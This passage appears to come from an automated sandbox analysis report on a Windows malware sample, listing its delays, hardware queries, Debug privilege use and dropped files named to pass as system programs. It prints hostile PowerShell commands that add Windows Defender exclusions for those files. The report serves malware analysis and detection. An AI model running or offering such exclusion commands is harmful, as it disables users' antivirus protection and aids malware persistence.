                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -586687s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -586567s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -586436s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -586137s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -585605s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -585437s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -585156s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -584959s >= -30000s
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe TID: 6956Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 2120Thread sleep time: -30000s >= -30000s
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe TID: 8040Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe TID: 4456Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe TID: 6300Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 6792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe TID: 3864Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe TID: 3396Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 30000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 600000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599854
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599734
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599622
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599512
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 3600000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599241
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599109
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 598453
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 598156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 597968
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 597093
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596843
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596625
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596296
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596015
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595800
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595562
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595343
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595195
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594921
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594531
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594295
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594155
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593953
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593812
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593693
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593562
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593442
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593297
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593168
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593062
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592921
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592807
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592643
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592492
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592375
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591640
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591433
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591140
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591031
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590907
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590781
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590666
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590561
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590452
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590343
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590223
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590080
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589953
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589836
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589734
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589624
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589515
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589405
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589235
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588340
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588234
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588125
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588015
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587906
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587794
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587577
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587358
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587082
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586937
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586790
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586567
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586436
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586137
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585605
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585437
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 584959
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1800732292.000000001B93A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeProcess token adjusted: Debug
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeProcess token adjusted: Debug
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeProcess token adjusted: Debug
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeProcess token adjusted: Debug
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeQueries volume information: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
